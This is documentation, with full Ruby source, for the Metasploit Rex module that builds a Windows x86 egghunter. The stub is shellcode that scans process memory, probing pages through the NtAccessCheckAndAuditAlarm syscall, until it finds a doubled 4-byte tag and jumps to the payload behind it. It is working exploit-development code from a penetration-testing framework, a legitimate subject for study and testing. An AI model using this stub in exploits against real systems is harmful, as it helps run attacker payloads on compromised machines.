Module: Rex::Exploitation::Egghunter::Windows::X86

Defined in:
lib/rex/exploitation/egghunter.rb

Constant Summary

Alias =
ARCH_X86

Instance Method Summary

Instance Method Details

#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object

The egg hunter stub for win/x86.

Raises:

RuntimeError — when opts[:eggtag] is not exactly 4 bytes long.

# File 'lib/rex/exploitation/egghunter.rb', line 40

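# Builds the egg hunter stub for win/x86.
#
# The emitted code walks the address space looking for the egg: the 4-byte
# :eggtag stored twice, back to back, with the payload right behind it. Before
# it dereferences a page it asks the kernel whether the page is readable
# (int 0x2e with syscall number 0x02, identified in the assembly as
# NtAccessCheckAndAuditAlarm), so scanning through unmapped memory does not
# fault the hunter itself. Once both tag copies match (and the optional
# checksum stub is satisfied) it jumps to the byte after the second tag.
#
# @param payload [String] the payload that follows the egg; only passed on to
#   checksum_stub
# @param badchars [String] bytes to avoid; forwarded to checksum_stub only —
#   the hunter stub assembled here is not filtered against them
# @param opts [Hash] options
# @option opts [String] :eggtag the 4-byte tag to search for (required)
# @option opts [String] :startreg name of a register that holds the address to
#   start scanning from; it is moved into edx (or used as-is if it is edx)
# @return [String] the assembled x86 machine code
# @raise [RuntimeError] if :eggtag is missing or not exactly 4 bytes long
def hunter_stub(payload, badchars = '', opts = {})
	egg_size = 4
	eggtag = opts[:eggtag].to_s
	startreg = opts[:startreg]

	# keep the size in one place so the check and the message cannot disagree
	raise RuntimeError, "Invalid egg string! Need #{egg_size} bytes." if eggtag.length != egg_size

	# the tag as a little-endian 32-bit immediate, formatted for Metasm
	marker = "0x%x" % eggtag.unpack('V').first

	# assembly for the optional checksum verification; spliced in verbatim below
	# (presumably empty or a no-op when the feature is disabled — see checksum_stub)
	checksum = checksum_stub(payload, badchars, opts)

	# optionally seed edx with the caller-supplied start address and skip the
	# initial page-alignment step by jumping straight to next_addr
	startstub = ''
	if startreg
		startstub = if startreg.downcase == 'edx'
			"\n\tjmp next_addr"
		else
			"\n\tmov edx,#{startreg}\n\tjmp next_addr"
		end
		startstub += "\n\t"
	end

	# edx is the scan pointer. `or dx,0xfff` + `inc edx` moves to the start of
	# the next 4 KiB page after a readability failure. The syscall returns its
	# status in eax; al == 5 is the low byte of 0xC0000005
	# (STATUS_ACCESS_VIOLATION), i.e. the page is unreadable and is skipped.
	# Two consecutive scasd matches are required so a stray copy of the tag
	# does not trigger a false hit; edi then points just past the egg.
	# NOTE(review): the syscall number 0x02 is hard-coded; int 0x2e numbering is
	# not stable across Windows versions, confirm it for the targets in scope.
	assembly = <<EOS
#{startstub}
check_readable:
	or dx,0xfff
next_addr:
	inc edx
	push edx
	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
	pop eax
	int 0x2e
	cmp al,5
	pop edx
	je check_readable
check_for_tag:
	; check that the tag matches once
	mov eax,#{marker}
	mov edi,edx
	scasd
	jne next_addr
	; it must match a second time too
	scasd
	jne next_addr

	; check the checksum if the feature is enabled
#{checksum}

	; jump to the payload
	jmp edi
EOS

	# assemble to raw bytes; this is the value the caller embeds
	Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
end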